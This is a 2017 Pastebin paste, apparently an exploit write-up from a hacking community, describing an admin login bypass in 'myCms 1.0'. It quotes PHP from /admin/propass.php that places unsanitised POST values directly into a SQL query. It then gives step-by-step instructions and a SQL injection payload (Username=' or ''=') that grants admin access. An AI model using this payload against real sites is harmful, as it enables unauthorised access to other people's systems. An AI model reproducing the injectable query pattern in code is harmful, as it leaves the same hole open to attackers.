SHARE
TWEET

Untitled

a guest Jun 19th, 2017 53 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###########################################
  2. ###### myCms 1.0 Admin-Login-Bypass #######
  3. ########### Found by IP-Sh0k ##############
  4. ### greetings to err000r^ and the whole ###
  5. ######### Back2Hack.cc community ##########
  6. ###########################################
  7. #
  8. # Vulnerable file: /admin/propass.php
  9. #
  10. ###########################################
  11. #
  12. # Vulnerable code:
  13. #
  14. # $luser = $_POST['Username'];
  15. # $lpass = $_POST['Password'];
  16. #
  17. # $sql = "SELECT * FROM account WHERE Usern = '$luser' and Passn = '$lpass'";
  18. # $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
  19. #
  20. # while($result = mysql_fetch_array($query)) {
  21. #   $ID = stripslashes($result["AID"]);
  22. #   setcookie("ID",$ID,time()+3600);
  23. #
  24. #   header("Location: mainf.php");
  25. #
  26. ###########################################
  27. #
  28. # Bypass:
  29. #
  30. # 1. Set postdata to: Username=' or ''='&Password=empty
  31. # 2. and go to /admin/propass.php (now the cookies will be set)
  32. # 3. Go to /admin/
  33. # 4. Now you're logged in as admin
  34. #
  35. ###########################################
RAW Paste Data
Top